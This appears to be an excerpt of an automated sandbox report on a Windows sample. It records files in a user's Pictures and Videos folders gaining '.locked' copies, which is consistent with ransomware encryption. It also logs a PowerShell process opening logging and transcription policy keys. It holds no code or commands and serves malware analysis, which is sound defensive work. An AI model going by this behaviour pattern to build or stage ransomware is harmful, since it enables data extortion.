| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\dDv0VhBvkOgUsrdn0wQA.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\kMgbOIpQMxVFXlnG7.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\TW8F PgmZP1TQs q.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\TW8F PgmZP1TQs q.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp.locked | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi.locked | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\HvvHqo0ADHwSN3BP13g.avi | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\HvvHqo0ADHwSN3BP13g.avi.locked | type = file_type |
|
2 | |
| Delete | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav | - |
|
1 | |
|
For performance reasons, the remaining 715 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (433)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\Transcription | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
84 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\XML | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\XML | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
5 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | - |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time | value_name = TZI, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = FirstEntry, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = FirstEntry, data = 2007, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\AUS Eastern Standard Time\Dynamic DST | value_name = LastEntry, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
